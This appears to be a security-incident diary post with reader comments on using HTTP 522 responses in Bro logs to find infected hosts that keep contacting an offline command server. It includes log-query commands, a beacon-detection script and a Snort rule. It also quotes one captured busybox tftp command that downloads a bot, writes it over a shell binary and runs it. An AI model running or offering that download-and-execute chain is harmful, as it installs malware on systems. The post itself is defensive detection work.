522 Error Code for the Win

Published: 2016-08-17
Last Updated: 2016-08-17 01:36:37 UTC
by Tom Webb (Version: 1)
2 comment(s)


Recently I ran across a tweet from Packet Watcher @jinq102030 (https://twitter.com/jinq102030/status/756476442590842880) suggesting that we keep an eye on HTTP status code 522 for possible malware check-ins. A 522 can mean several things, but from an IR perspective it can indicate that a malicious host has been pulled offline while a client on your network is still trying to connect to it. So I had our intern check the Bro logs to see what he could find.

>zcat http* | bro-cut ts id.orig_h id.resp_h host status_code | awk '$5 == "522"'


1467159441.247406    -    522
1467160356.407366    -    522
1467161271.647320    -    522
1467163102.087490    -    522
1467164017.337316    -    522
1467164932.547084    -    522
1467182323.201685    -    522
1467183238.447046    -    522
1467184153.641505    -    522
1467185068.903194    -    522


There was other traffic that turned out to be false positives, but you could easily tell that this IP was checking the same site on a regular schedule. Out of 4GB of compressed Bro logs for the day, only about 200 lines matched, so the noise ratio was very low.
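The regular spacing in the output above is the signal worth automating. As an added example (not part of the original diary), the script below reads Bro/Zeek http.log records using the #fields header the way bro-cut does, keeps only 522 responses, groups them by client, server and host, and reports how clock-like the check-ins are; the log lines, hosts and addresses are constructed for the demonstration.

```python
import statistics
from collections import defaultdict

# Constructed sample in Bro/Zeek http.log layout (tab-separated, #fields header).
# The c2.example rows mimic the roughly 915-second cadence seen in the diary output.
SAMPLE_LOG = """#separator \\x09
#fields\tts\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\thost\tstatus_code
1467159441.247406\t10.0.0.5\t50123\t203.0.113.10\t80\tc2.example\t522
1467159500.100000\t10.0.0.7\t50200\t198.51.100.9\t80\tnews.example\t200
1467160356.407366\t10.0.0.5\t50124\t203.0.113.10\t80\tc2.example\t522
1467161271.647320\t10.0.0.5\t50125\t203.0.113.10\t80\tc2.example\t522
1467162000.000000\t10.0.0.7\t50201\t198.51.100.9\t80\tcdn.example\t522
1467162186.887274\t10.0.0.5\t50126\t203.0.113.10\t80\tc2.example\t522
1467170000.000000\t10.0.0.7\t50202\t198.51.100.9\t80\tcdn.example\t522
"""


def parse_http_log(text):
    """Yield one dict per record, mapping columns by the #fields header like bro-cut."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split("\t")))


def find_522_beacons(text, min_hits=3):
    """Group 522 responses by (client, server, host) and measure interval regularity."""
    times = defaultdict(list)
    for rec in parse_http_log(text):
        if rec.get("status_code") == "522":
            key = (rec["id.orig_h"], rec["id.resp_h"], rec["host"])
            times[key].append(float(rec["ts"]))
    results = {}
    for key, ts in times.items():
        if len(ts) < min_hits:
            continue  # a stray 522 or two from an ordinary site is expected noise
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        results[key] = {
            "hits": len(ts),
            "median_gap_s": round(statistics.median(gaps), 1),
            "jitter_s": round(statistics.pstdev(gaps), 1),  # near zero = timer-driven
        }
    return results


if __name__ == "__main__":
    for key, info in find_522_beacons(SAMPLE_LOG).items():
        print(key, info)
```

A low jitter value with a multi-minute median gap is the pattern to pivot on: pull the full packet capture for that client and look at what it fetched before the 522s started.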

When looking at the full packet capture for the system in question, we were able to tell that it had been compromised and had downloaded a bot.


cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

This is certainly something we are going to keep looking at for finding more compromised systems.


Tom Webb




That is a nice thing to check for.

I made a SNORT IDS rule for that.

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"NF - Error 522 - Connection timed out - Check client for compromise"; content:"522"; http_stat_code; reference:url,isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/; reference:url,networkforensic.dk; metadata:18082016; priority:2; sid:6001948; rev:1;)

Happy hunting

Oh nice signature, may I respectfully recommend flow:established,from_server and classtype:bad-unknown?

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"NF - Error 522 - Connection timed out - Check client for compromise"; flow:established,from_server; content:"522"; http_stat_code; reference:url,isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/; reference:url,networkforensic.dk; classtype:bad-unknown; metadata:18082016; priority:2; sid:6001948; rev:2;)

Nathan Fowler
